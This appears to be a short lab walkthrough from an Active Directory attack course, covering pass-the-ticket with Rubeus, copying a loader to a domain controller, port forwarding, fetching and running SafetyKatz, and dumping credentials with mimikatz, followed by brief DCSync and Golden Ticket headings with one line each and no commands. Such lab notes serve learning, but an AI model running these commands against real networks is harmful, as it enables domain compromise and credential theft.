Obj 8 Golden Ticket / DCSync

Task - Extract secrets from DA, Create a Golden Ticket, Use Golden Ticket

Use Rubeus to create a new session to start a new session as svcadmin which has DA privileges

C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Copy Loader.exe to the DC

echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y

We can use winrs or PSSession to access the DC

winrs -r:dcorp-dc cmd

Now we are going to forward port 8080 on the DC back to us

netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.x

Now we can access our file directory on our studentvm

C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe

We should now have a mimikatz # term to run commands in

The below command will dump the creds of the DC

lsadump::lsa /patch

- DCSYNYC -

To get NTLM hash and AES keys of the krbtgt account, we can use the DCSync attack

- GOLDEN TICKET -

we can use BetterSafetyKatz.exe to create a Golden ticket

Now we can access the DC

Last updated